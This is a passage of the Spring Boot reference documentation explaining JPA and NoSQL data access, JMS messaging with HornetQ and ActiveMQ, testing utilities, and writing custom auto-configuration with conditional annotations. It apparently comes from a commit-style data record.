an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`spring.jpa.*` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`:\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `spring.jpa.properties.*` (the prefix is stripped before adding them\nto the entity manager). By default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate autoconfig is active because the `ddl-auto`\nsettings are more fine-grained.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. 
Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate`, where the exclusion is based on the bean\nname ``redisTemplate'', not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` ``Starter POM''.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can set the `spring.data.mongodb.uri` property to change the URL, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n
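A minimal sketch of such a bean (the host and port are hypothetical, using the legacy `com.mongodb.Mongo` constructor from the 2.x driver):\n\n[source,java,indent=0]\n----\n\timport java.net.UnknownHostException;\n\n\timport com.mongodb.Mongo;\n\timport org.springframework.context.annotation.*;\n\n\t@Configuration\n\tpublic class MongoConfiguration {\n\n\t\t@Bean\n\t\tpublic Mongo mongo() throws UnknownHostException {\n\t\t\t\/\/ connect to a specific server instead of the auto-configured default\n\t\t\treturn new Mongo(\"mongoserver\", 27017);\n\t\t}\n\n\t}\n----\n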
[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate` Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` ``Starter POM''\nfor collecting the dependencies in a convenient way. There is currently no auto-configuration\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` ``Starter POM'' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. 
By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nElasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` ``Starter POM'' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated ``host:port'' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. 
Spring AMQP provides a similar feature set for the\n``Advanced Message Queuing Protocol'' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring WebSocket and Spring Boot has support for that through starters and a small\namount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details).\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`spring.hornetq.*`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee {sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the ``name'' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`spring.activemq.*`. 
For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-using-jms-template]]\n==== Using JmsTemplate\nSpring's `JmsTemplate` is auto-configured and you can `@Autowire` it directly into your\nown beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP, etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if ``spring-integration-jmx'' is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n``mbeanServer'' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` ``Starter POM'' (in the `test` scope), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. 
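For instance, a bean that receives its collaborators through its constructor can be tested directly (this `GreetingService` and its test are purely hypothetical):\n\n[source,java,indent=0]\n----\n\timport static org.junit.Assert.*;\n\n\timport org.junit.Test;\n\n\tpublic class GreetingServiceTests {\n\n\t\t\/\/ no Spring context required; just construct the object\n\t\tprivate final GreetingService service = new GreetingService(\"Hello\");\n\n\t\t@Test\n\t\tpublic void greets() {\n\t\t\tassertEquals(\"Hello World\", this.service.greet(\"World\"));\n\t\t}\n\n\t}\n----\n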
You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond ``unit testing'' and start ``integration testing'' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` ``Starter POM'' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMvc`) by looking for the `@WebAppConfiguration` annotation. (`MockMvc` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time-consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. 
`@IntegrationTest(\"server.port:9000\")`.\nAdditionally, you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that you\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. 
Simply declare the capture as a `@Rule`, then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. 
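A minimal sketch of such an ordered auto-configuration, reusing the hypothetical `LibXWebAutoConfiguration` from the `spring.factories` example above:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@AutoConfigureAfter(WebMvcAutoConfiguration.class)\n\tpublic class LibXWebAutoConfiguration {\n\n\t\t\/\/ @Bean definitions that build on the Spring MVC setup go here\n\n\t}\n----\n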
If you provide web-specific configuration, for example, your class may need to be applied\nafter `WebMvcAutoConfiguration`, which is exactly what the sketch above declares.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to ``override'' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allow configuration\nto be skipped based on the presence or absence of specific classes. Because\nannotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configured `@Configuration` classes are always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n
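Putting a few of these conditions together, a sketch of a guarded auto-configuration (the `LibXClient` type is hypothetical):\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@ConditionalOnClass(LibXClient.class)\n\tpublic class LibXAutoConfiguration {\n\n\t\t@Bean\n\t\t@ConditionalOnMissingBean\n\t\tpublic LibXClient libXClient() {\n\t\t\t\/\/ only created when LibX is on the classpath and the user has\n\t\t\t\/\/ not declared a LibXClient bean of their own\n\t\t\treturn new LibXClient();\n\t\t}\n\n\t}\n----\n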
\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.adoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","old_contents":"[[boot-features]]\n= Spring Boot features\n\n[partintro]\n--\nThis section dives into the details of Spring Boot. Here you can learn about the key\nfeatures that you will want to use and customize. If you haven't already, you might want\nto read the '<<getting-started.adoc#getting-started>>' and\n'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding\nof the basics.\n--\n\n\n\n[[boot-features-spring-application]]\n== SpringApplication\nThe `SpringApplication` class provides a convenient way to bootstrap a Spring application\nthat will be started from a `main()` method. In many situations you can just delegate to\nthe static `SpringApplication.run` method:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MySpringConfiguration.class, args);\n\t}\n----\n\nWhen your application starts you should see something similar to the following:\n\n[indent=0,subs=\"attributes\"]\n----\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: v{spring-boot-version}\n\n2013-07-31 00:08:16.117 INFO 56603 --- [ main] o.s.b.s.app.SampleApplication : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (\/apps\/myapp.jar started by pwebb)\n2013-07-31 00:08:16.166 INFO 56603 --- [ main] ationConfigEmbeddedWebApplicationContext : Refreshing 